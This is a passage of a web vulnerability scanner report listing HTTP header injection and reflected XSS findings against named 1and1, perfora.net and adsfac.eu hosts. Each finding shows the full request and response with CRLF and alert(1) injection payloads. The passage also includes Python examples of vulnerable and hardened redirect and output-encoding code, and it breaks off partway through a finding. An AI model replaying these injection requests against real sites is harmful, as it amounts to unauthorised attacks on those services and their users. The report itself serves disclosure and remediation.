Location: http://mywebsite.1and1.com:80/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723956412&__lf=Static1d2d8
4b0a099611f

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=LcWY2ZFxXWS5XV1dRZFphJ19ZPS85cmVfN05BOyMnJCQjIiAgJB0eHBs0NSstLCsoTTtnXF5sJSQiUipUYykcHTE3NS8vNCoxKSwvMGhpLyIrW2QqHR4bODYwMDUrMiotMA==; Expires=Fri, 03-Nov-2079 03:26:43 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.11. http://mywebsitepersonal.1and1.com/create-personal-website [__lf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mywebsitepersonal.1and1.com
Path:   /create-personal-website

Issue detail

The value of the __lf request parameter is copied into the Location response header. The payload 1e4d2%0d%0aaf47e65b5a was submitted in the __lf parameter. This caused a response containing an injected HTTP header.

Request

GET /create-personal-website;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?startClub=false&__lf=1e4d2%0d%0aaf47e65b5a&__rd=ac170c55P5SqPtlGgDqAkvhpyGHa9HP2&origin[site]=PU.NGH.US&origin[page]=build-website&ucuoId=PUlead%3Adefault.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a HTTP/1.1
Host: mywebsitepersonal.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://mywebsite.1and1.com/;jsessionid=6C2C08B118A98461DA8F6BE407BCC829.TCpfix221b?__reuse=1318723908161&__lf=Static
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:2:AAABMwoSV1xjeIGFZAlpKqGNb2QXMatX:1318723934044; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:31 GMT
Server: Apache
Location: http://mywebsitepersonal.1and1.com:80/;jsessionid=F1E6BADB229760CEAA9FD35CE214E72F.TCpfix223b?__reuse=1318724011866&__lf=1e4d2
af47e65b5a

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: _ut=9ZlsrWVFMTjpjY2NdcGZtM2tlMiQuZ1pULEM2MBgcMDAvLiwsMCkqKCgmKiAiISAdQjBcUVN4MTAwXjZgbzUoKSYsKiQkKSImHSAiJXR1Oy43Z3A2KSonLSslJSojJx4hIw==; Expires=Fri, 03-Nov-2079 03:27:38 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.12. http://order.1and1.com/Jumpto [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload 47245%0d%0a60df6232878 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static47245%0d%0a60df6232878&site=PU.NGH.US&origin.page=Home&page=build-website&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:29 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=PU.NGH.US&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static47245
60df6232878

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsWlJNTyRkZGRecWduNGxmMyUvaFtVLUQ3MRkdGjEwLy0tMSorKSgoLSEjIiEeQzFdUlRiMjMvXjdhcDYpKictKyUlKSgoIx8fJl52PC84aHE3KisoLiwmJiopKSQgIA==; Expires=Fri, 03-Nov-2079 03:26:37 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.13. http://order.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e2d51%0d%0af6b299eb523 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=PU.NGH.US&origin.page=Home&page=build-website&linkOrigin=Home&linkId=hd.nav.diy&e2d51%0d%0af6b299eb523=1 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:14:52 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=PU.NGH.US&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&e2d51
f6b299eb523
=1&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Ra2AwXlZRUyhRUVFLdWtyOHBqNykzbF9ZMUg7NR0hHh4dHBoxNS4vLSwsMSUnJiUiRzVhVlhmHyAcSztldDotLisxLykpLSwsJyMjKmJjKRwlbHU7Li8sMjAqKi4tLSgkJA==; Expires=Fri, 03-Nov-2079 03:28:59 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.14. http://order.1and1.com/Jumpto [origin.page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 654e6%0d%0a476e9112dfd was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=PU.NGH.US&origin.page=654e6%0d%0a476e9112dfd&page=build-website&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:59 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=654e6
476e9112dfd
&target.site=PU.NGH.US&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=HdWo6aGBbXTJbW1tVaF5lK2NdKhwmX2ljO1JFPycrKCgnJiQkKCEiIB8fJBgaMC8sUT9rYGJwKSomVS5YZy0gIR4kIhwzNzY2MS0tNGxtMyYvX2guISIfJSMdHTg3NzIuLg==; Expires=Fri, 03-Nov-2079 03:27:06 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.15. http://order.1and1.com/Jumpto [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the page request parameter is copied into the Location response header. The payload c1508%0d%0aa00c42b9c91 was submitted in the page parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=PU.NGH.US&origin.page=Home&page=c1508%0d%0aa00c42b9c91&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:13:14 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=PU.NGH.US&target.page=c1508
a00c42b9c91
&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExX1dSVClSUlJMX2xzOXFrOCo0bWBaMkk8Nh4iHx8eHRsbNi8wLi0tMiYoJyYjSDZiV1lnICEdTCVmdTsuLywyMCoqLi0tKCQkK2NkKh0mVnY8LzAtMzErKy8uLiklJQ==; Expires=Fri, 03-Nov-2079 03:27:21 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.16. http://order.1and1.com/Jumpto [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /Jumpto

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 97bdb%0d%0aefd6c702fd1 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /Jumpto;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a?__lf=Static&site=97bdb%0d%0aefd6c702fd1&origin.page=Home&page=build-website&linkOrigin=Home&linkId=hd.nav.diy HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://order.1and1.com/;jsessionid=25F9478E2046C94EAA509963E4903167.TCpfix241a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=3a1bb04efa928c00; variant.configname=2011-09-16; variant="bGVhZDpkZWZhdWx0""; UT=DYlcnbGRfYTZfX19ZbGJpL2dhLiAqY1ZQKD9JQysvLCwrKigoLCUmJCMjKBweHRwZPkNvZGZ0LS4qWTJcazEkJSIoJiAgJCMjNTExOHBxNyozY2wyJSYjKSchISUkJB8yMg==; emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2lTHzFUwMc9tG_kstw966Ml:1318723912553; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; lastpage=Home

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:12:45 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=25F9478E2046C94EAA509963E4903167.TCpfix241a&origin.page=Home&target.site=97bdb
efd6c702fd1
&target.page=build-website&global.ucuoId=PUlead:default.WH.US-20111016021129-25F9478E2046C94EAA509963E4903167.TCpfix241a&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0YlpVVyxVVVVPYlhfJXRuOy03cGNdNUw/OSElIiIhIB4eIhscMTAwNSkrKikmSzllWlxqIyQgTyhSYScxMi81My0tMTAwKycnLmZnLSApWWIoGzMwNjQuLjIxMSwoKA==; Expires=Fri, 03-Nov-2079 03:26:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8


1.17. https://webmailcluster.perfora.net/xml/webmail/Login [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://webmailcluster.perfora.net
Path:   /xml/webmail/Login

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 3d157%0d%0ac8839f14f03 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /xml/webmail/3d157%0d%0ac8839f14f03?__frame=_top HTTP/1.1
Host: webmailcluster.perfora.net
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://webmailcluster.perfora.net/xml/webmail/Login;jsessionid=9DD62E595F1975C38458ECC1B47B7EC5.TC134b?__reuse=1318724040320
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __PFIX_TST_=169a8b227ca6fc00; __PFIX_SEC_dddcfcdaee92fb44ac62c05d16000005=1318724044256:4490eb2bb01fb400

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 16 Oct 2011 00:18:23 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7b395f35d931c000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: https://webmailcluster.perfora.net/xml/webmail/3d157
c8839f14f03
;jsessionid=248E30A91620245D24A559966813F471.TC137b?__frame=_top
Content-Length: 0
Vary: User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

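What findings 1.13 to 1.17 have in common, shown as an added Python example that is not code from this report or from the affected sites: a hypothetical redirect handler that rebuilds the Location header from the percent-decoded query the way the responses above suggest, the hardened form that re-encodes every name and value and then refuses to emit any CR or LF, and a small check that picks out the header lines the scanner is flagging. REDIRECT_BASE and the query string are taken from finding 1.13; the handler logic, function names and the header-name pattern are assumptions for illustration.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlencode

# Taken from the Location headers in the report's responses.
REDIRECT_BASE = "http://redirect.1and1.com/"

# Constructed query string copied from finding 1.13: the parameter *name*
# carries a percent-encoded CR LF pair.
INJECTED_QUERY = "e2d51%0d%0af6b299eb523=1&__lf=Static"

# RFC 7230 token characters followed by a colon: what a real header line starts with.
HEADER_NAME = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+:")


def vulnerable_location(query_string: str) -> str:
    """Hypothetical handler mirroring the behaviour the report shows: decode the
    query, then concatenate the decoded names and values straight back into the
    Location value without re-encoding them."""
    params = parse_qsl(query_string, keep_blank_values=True)
    return REDIRECT_BASE + "?" + "&".join(f"{k}={v}" for k, v in params)


def safe_location(query_string: str) -> str:
    """Hardened form: urlencode re-encodes every name and value (CR and LF
    become %0D%0A), and a final check refuses to build the header at all if a
    control character somehow survived."""
    params = parse_qsl(query_string, keep_blank_values=True)
    location = REDIRECT_BASE + "?" + urlencode(params)
    if re.search(r"[\r\n\x00]", location):
        raise ValueError("control character in Location header")
    return location


def build_response(location: str) -> bytes:
    """Serialise a minimal 302 the way a naive framework would."""
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: {location}\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def injected_header_lines(raw: bytes) -> list[str]:
    """Return header-block lines that are not well-formed `Name: value` headers.
    Any such line was created by splitting a header value, which is exactly the
    evidence the scanner reports above."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")[1:]  # drop the status line
    return [line for line in lines if not HEADER_NAME.match(line)]


if __name__ == "__main__":
    print(injected_header_lines(build_response(vulnerable_location(INJECTED_QUERY))))
    print(safe_location(INJECTED_QUERY))
```

The check in safe_location is deliberately redundant with urlencode: frameworks that already reject control characters in header values (many do) still benefit from the re-encoding, because an attacker who finds a path that bypasses the framework check gets a harmless %0D%0A rather than a split response.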

2. Cross-site scripting (reflected)
There are 20 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences. First, input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain: a page or site identifier should match a short allow-list of characters, and an identifier such as mboxId should be checked to be numeric before it is used. Second, user input should be encoded for its output context at every point where it is copied into a response: HTML metacharacters (< > " ' &) replaced with the corresponding entities where the value lands in HTML text or in an attribute, and quotes, backslashes and the < > characters escaped where it lands inside a JavaScript string literal. In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
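The two layers above, as an added Python example that is not part of the scanner report or of any of the listed sites' code: context-specific encoders for HTML text, a double-quoted HTML attribute and a JavaScript string literal (the three contexts the findings in this section exhibit), plus an integer check for the one context, a bare JavaScript argument as in finding 2.8, that no encoder can make safe. The render_* functions are hypothetical hardened rewrites of the vulnerable response lines shown in the findings; the MBOX_NAME and MBOX_ID patterns are assumptions about what those parameters legitimately contain; the payloads are the report's own.

```python
import html
import json
import re

# Payloads copied from findings 2.1, 2.2, 2.4 and 2.8 of this report, reused
# here as constructed test inputs.
ATTR_PAYLOAD = 'a8a90"><script>alert(1)</script>217a337aa5b'
JS_PAYLOAD = "82846';alert(1)//bc7259a2a3e"
TEXT_PAYLOAD = "c33b9<script>alert(1)</script>6afa09c7826"
BARE_JS_PAYLOAD = "0e3302<script>alert(1)</script>df23f11db5e"

# Layer 1, validation on arrival. Both patterns are assumptions about what the
# mbox and mboxId parameters legitimately look like ("SiteCatalyst: event", "0").
MBOX_NAME = re.compile(r"^[A-Za-z0-9_.:\- ]{1,64}$")
MBOX_ID = re.compile(r"^[0-9]{1,10}$")


def is_safe_mbox_name(value: str) -> bool:
    return MBOX_NAME.match(value) is not None


def is_valid_mbox_id(value: str) -> bool:
    return MBOX_ID.match(value) is not None


# Layer 2, output encoding chosen by the context the value lands in.
def encode_html_text(value: str) -> str:
    """Text between tags (finding 2.4): entity-encode < > & " '."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Inside a double-quoted attribute value (2.1, 2.3). Same entities; the
    caller must still wrap the attribute value in quotes."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Inside a JavaScript string literal (2.2, 2.6, 2.7). json.dumps escapes
    backslash, double quote and control characters; the extra replacements stop
    a single quote from closing a '...' literal and stop </script> from ending
    the enclosing script block."""
    body = json.dumps(value, ensure_ascii=True)[1:-1]
    for ch, esc in (("'", "\\u0027"), ("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        body = body.replace(ch, esc)
    return body


# Hypothetical hardened rewrites of the vulnerable lines shown in the findings.
def render_link(cc: str) -> str:
    """Hardened form of the ag.asp anchor from 2.1."""
    return f'<a href="http://adsfac.eu/link.asp?cc={encode_html_attr(cc)}" target="_blank"></a>'


def render_clk_script(clk: str) -> str:
    """Hardened form of the fd_clk assignment from 2.2."""
    return f"var fd_clk = '{encode_js_string(clk)}';"


def render_error(path: str) -> str:
    """Hardened form of the 404 body from 2.4."""
    return f"<html>No servlet bound to path/alias: {encode_html_text(path)}</html>"


def render_mbox_call(mbox: str, mbox_id: str) -> str:
    """Hardened form of the Test & Target script from 2.6 to 2.8. The mbox name
    is a JS string literal, so it is encoded; mboxId is emitted as a bare numeric
    argument, a context no encoder can make safe, so it is validated instead."""
    if not is_valid_mbox_id(mbox_id):
        raise ValueError("mboxId must be an integer")
    return (
        f"mboxFactories.get('default').get('{encode_js_string(mbox)}', {int(mbox_id)})"
        ".setOffer(new mboxOfferDefault()).loaded();"
    )


if __name__ == "__main__":
    print(render_link(ATTR_PAYLOAD))
    print(render_clk_script(JS_PAYLOAD))
    print(render_error(TEXT_PAYLOAD))
    print(render_mbox_call("newhome_offer", "0"))
```

The point of keeping separate functions per context is that the findings below differ precisely in context: the same `<script>` payload that breaks out of HTML text in 2.4 is inert inside the JavaScript string literal in 2.6, while a single quote, which html.escape would also neutralise, is what breaks out in 2.2. Validation alone is the right answer for mboxId only because it is an integer; for free-form names it is a first filter, not a substitute for encoding.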


2.1. http://adsfac.eu/ag.asp [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a90"><script>alert(1)</script>217a337aa5b was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ag.asp?cc=a8a90"><script>alert(1)</script>217a337aa5b&source=iframe&;click=http://adclient.uimserv.net/event.ng/Type=click&FlightID=384821&AdID=774139&TargetID=121326&Values=c9mDkIjMpOkOmOnPjRpIHa69lMEbCq456q48yfBk638l8Gj8Go8Hj83Yh34p855l9wq9Mj9RoF73nG7wa399nH5Da535qI37lI63qI8Ea58Fa58Ga58Ia637nJ97jJ97lKYpK33pK4Aa896rMFnMPmM580&RawValues=USERIDRAW%2Cac140919-18506-1318724448-1%2CSECTIONID%2Cgm1/themen/finanzen/wirtschaft/13914150&Redirect=;ord=cbIomae,bhjuiRwbsiyA&clk= HTTP/1.1
Host: adsfac.eu
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.gmx.net/themen/finanzen/wirtschaft/508a886-rom-finanz-proteste-eskalieren
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=610040839265718; FSCIT007=pctl=28473&pctm=2&FM149947=2&pctc=149947&FQ=2&fpt=0%2C28473%2C&pct%5Fdate=4294&FL28473=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Length: 198
Content-Type: text/html
Expires: Sun, 16 Oct 2011 00:22:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa8a90%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E217a337aa5b0=uid=7014984; expires=Mon, 17-Oct-2011 00:23:26 GMT; domain=.adsfac.eu; path=/
Set-Cookie: FSa8a90%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E217a337aa5b=pctl=0&fpt=0%2C0%2C&pct%5Fdate=4306&pctm=1&FM1=1&pctc=1&FL0=1&FQ=1; expires=Wed, 16-Nov-2011 01:23:26 GMT; domain=.adsfac.eu; path=/
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Sun, 16 Oct 2011 00:23:27 GMT
Connection: close

<a href="http://adsfac.eu/link.asp?cc=a8a90"><script>alert(1)</script>217a337aa5b.0.0&CreativeID=1" target=_blank><img src="http://adsfac.eu/creative.asp?CreativeID=1" width=1 height=1 border=0></a>

2.2. http://adsfac.eu/ag.asp [clk parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adsfac.eu
Path:   /ag.asp

Issue detail

